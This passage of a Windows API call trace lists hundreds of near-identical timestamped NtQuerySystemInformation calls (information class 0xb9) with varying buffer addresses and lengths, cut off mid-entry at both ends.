(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc928, Length=0x58, ResultLength=0x0) [0272.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0272.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x28, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0272.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc928, Length=0x58, ResultLength=0x0) [0272.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0272.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x28, ResultLength=0x0) [0272.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0272.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0272.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x28, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0272.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x20, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x20, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x20, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0272.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0272.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0272.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0272.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0272.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x28, ResultLength=0x0) [0272.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0272.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0272.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 